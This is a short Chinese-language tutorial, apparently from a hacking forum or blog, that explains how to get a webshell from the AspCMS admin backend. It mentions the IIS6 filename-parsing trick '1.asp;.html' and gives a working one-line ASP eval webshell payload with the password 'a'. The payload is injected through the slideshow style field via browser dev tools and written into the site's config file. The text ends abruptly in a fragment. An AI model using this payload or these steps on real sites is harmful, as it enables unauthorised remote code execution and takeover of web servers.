aspcms在老版本中可以通過添加模板直接添加asp.但是新版的aspcms中已經限制了添加模板的格式爲html,js,css,當然如果是遇到iis6的話還是可以通過iis6的解析漏洞把文件名改成1.asp;.html這樣的格式來拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通殺版本的後臺拿shell方法.
1、進入後臺,“擴展功能”--“幻燈片設置”--”幻燈樣式”
2、使用chorme的審查元素功能或者firefox的firebug,總之使用能修改當前頁面元素的工具就好了。將對應的slidestyle的value的值修改爲1%><%Eval(Request (chr(65)))%><%
3、一句話***,密碼a。在/config/AspCms_Config.asp
4.
管理員漏洞